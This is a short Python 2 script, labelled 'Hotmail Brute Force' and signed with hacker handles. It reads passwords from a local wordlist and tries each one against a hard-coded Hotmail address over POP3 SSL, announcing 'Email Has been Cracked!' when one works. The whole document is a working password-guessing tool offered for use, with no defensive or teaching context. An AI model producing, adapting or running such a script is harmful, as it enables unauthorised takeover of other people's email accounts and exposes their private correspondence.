import poplib
from winsound import Beep
print '''
========================================
|         Hotmail Brute Force          |
|               Str1k3r                |
|          h4moud@hotmail.com          |
|     Iam Hamoud \ thanks for Ricardo  |
|            [Str1k3r,nj]              |
========================================'''
print "[~]Make TXT file Str1k3r.txt and put the password \n[~]and make sure it's on the seem programe folder\n"
def con(pwd):
    M = poplib.POP3_SSL('pop3.live.com', 995) 
    try:
        M.user("t2-@hotmail.com")
        M.pass_(pwd)
    except:
        print "[-]password incorrect"
    else:
        print '[+]Email Has been Cracked!','\n[+]Password:', pwd 
	Beep(3000,800)
        exit()

f = open("Str1k3r.txt", "r")
for pwd in f.readlines():
    con(pwd.replace("\r", "").replace("\n", ""))
